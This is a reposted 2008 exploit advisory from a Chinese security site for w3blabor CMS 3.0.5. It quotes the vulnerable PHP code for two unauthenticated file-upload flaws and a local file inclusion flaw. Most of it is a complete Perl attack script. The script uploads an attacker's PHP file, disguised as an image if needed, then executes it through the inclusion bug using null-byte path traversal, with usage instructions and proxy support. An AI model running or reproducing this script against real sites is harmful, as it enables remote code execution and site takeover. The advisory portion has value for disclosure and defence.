w3blabor CMS 3.0.5 Arbitrary File Upload & LFI Exploit
|
来源:http://www.w3blaborcms.de 作者:DNX 发布时间:2008-12-08
|
|
#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use Getopt::Long;
# \#'#/ # (-.-) # ------------------oOO---(_)---OOo----------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2oo8 | # -------------------------------------------------- # | w3blabor v3.0.5 Arbitrary File Upload & LFI | # -------------------------------------------------- # [!] Discovered.: DNX # [!] Vendor.....: http://www.w3blaborcms.de # [!] Detected...: 17.10.2008 # [!] Reported...: 29.11.2008 # [!] Response...: xx.xx.2008 # # [!] Background.: Sicher! Schnell! Einfach! # Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe # abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der # angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im # Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht # es zu etwas Besonderem! # # [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges) # # 71: if (isset($_GET['action']) && $_GET['action'] == "upload") { # # 80: $dir = "../../includes/media"; # 81: $file = $_FILES['datei']['name']; # # 92: $file = strtolower($file); # 93: # 94: move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file); # 95: @chmod("".$dir.""/"".$file."", 0777); # # [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges) # # 45: $neueslogo = $_FILES['neueslogo']['name']; # 46: $logopfad = "../../includes/upload/".$settings['page_logo'].""; # 47: # 48: $endung = substr ($_FILES['neueslogo']['name'], -3); # 49: # 50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) { # # 54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo); # # [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off) # # 43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php"; # 44: # 45: if (file_exists($modulfile)) { # 46: # 47: include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php"; # # [!] Solution...: no update from vendor till now #
if(!$ARGV[4]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n ----------------oOO---(_)---OOo----------------"; print "\n | w3blabor v3.0.5 Arbitrary File Upload & LFI |"; print "\n | coded by DNX |"; print "\n -----------------------------------------------"; print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>"; print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg"; print "\n[!] Targets:"; print "\n -1 Upload over media.inc.php"; print "\n -2 Upload over meinlogo.inc.php"; print "\n[!] Options:"; print "\n[!] -f [filename] Path to local file with php code"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; }
my $host = $ARGV[0]; my $path = $ARGV[1]; my $file = ""; my %options = (); GetOptions(\%options, "1", "2", "f=s", "p=s");
if($options{"f"}) { $file = $options{"f"}; if(!-e $file) { print "[!] Failed, local file doesn't exist.\n"; exit; } } else { print "[!] Failed, see usage.\n"; exit; }
print "[!] Exploiting...\n";
use_bug($host, $path, $file);
print "[!] Exploit done\n";
sub use_bug { my $host = shift; my $path = shift; my $file = shift; my $ua = LWP::UserAgent->new(); my $url = ""; my $url2 = ""; my $req = ""; $file =~ /.*[\/|\\](.*)/; my $filename = $1; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } if($options{"1"}) { $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload'; $url2 = 'http://'.$host.$path.'includes/media/'.$filename; $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ]; } if($options{"2"}) { if($file =~ m/.*\.jpg|peg|png|gif/i) { $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload'; $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00'; $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ]; } else { print "[!] Failed, rename your local file to .jpg\n"; exit; } } $ua->request($req); my $res = $ua->get($url2); if($res->is_success) { print "[!] File uploaded\n"; print "[!] Check your file @ ".$url2."\n"; } else { print "[!] Failed\n"; } }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|